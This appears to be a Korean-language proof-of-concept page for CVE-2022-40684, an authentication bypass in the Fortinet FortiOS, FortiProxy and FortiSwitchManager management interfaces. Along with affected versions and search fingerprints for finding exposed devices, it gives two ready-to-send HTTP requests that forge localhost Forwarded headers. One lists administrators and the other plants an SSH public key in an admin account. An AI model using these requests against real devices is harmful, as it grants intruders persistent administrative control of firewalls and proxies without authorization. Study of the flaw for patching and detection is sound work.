
CVE-2022-40684에 대한 PoC 및 익스플로잇입니다. 이 취약점은 Fortinet FortiOS, FortiProxy 및 FortiSwitchManager 관리 인터페이스의 인증 우회로, 조작된 HTTP 요청을 통해 인가되지 않은 관리자 접근을 가능하게 합니다.
모든 개인과 조직은 네트워크를 사용할 때 헌법과 법률을 준수하고, 공공 질서를 지키며, 사회 공덕을 존중해야 하며, 네트워크 보안을 해쳐서는 안 되며, 국가 안전, 명예 및 이익을 해치는 활동에 네트워크를 이용해서는 안 됩니다.
Fortinet(飞塔)은 세계적으로 유명한 네트워크 보안 제품 및 보안 솔루션 제공업체로, 제품에는 방화벽, 안티바이러스 소프트웨어, 침입 방지 시스템 및 엔드포인트 보안 구성 요소 등이 포함됩니다. 영향을 받는 FortiOS, FortiProxy 및 FortiSwitchManager 제품의 관리 인터페이스에서 대체 경로나 채널을 사용하여 인증을 우회하고, 인증 없이 특수하게 조작된 HTTP 또는 HTTPS 요청을 통해 관리 인터페이스에 작업을 수행할 수 있습니다.
높음
FortiOS 버전 7.2.0 - 7.2.1
FortiOS 버전 7.0.0 - 7.0.6
FortiProxy 버전 7.2.0
FortiProxy 버전 7.0.0 - 7.0.6
FortiSwitchManager 버전 7.2.0
FortiSwitchManager 버전 7.0.0
title="FortiProxy"
title="FortiGate"

GET /api/v2/cmdb/system/admin HTTP/1.1
Host: 目标
User-Agent: Node.js
Accept-Encoding: gzip, deflate
Accept: */*
Hosts: 127.0.0.1:9980
Forwarded: by="[127.0.0.1]:80";for="[127.0.0.1]:49490";proto=http;host=
X-Forwarded-Vdom: root

PUT /api/v2/cmdb/system/admin/用户名 HTTP/2
Host: 目标
User-Agent: Report Runner
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Forwarded: for="[127.0.0.1]:8888";by="[127.0.0.1]:8888"
Content-Length: 589
Content-Type: application/json
{"ssh-public-key1": "\"公钥内容\""}

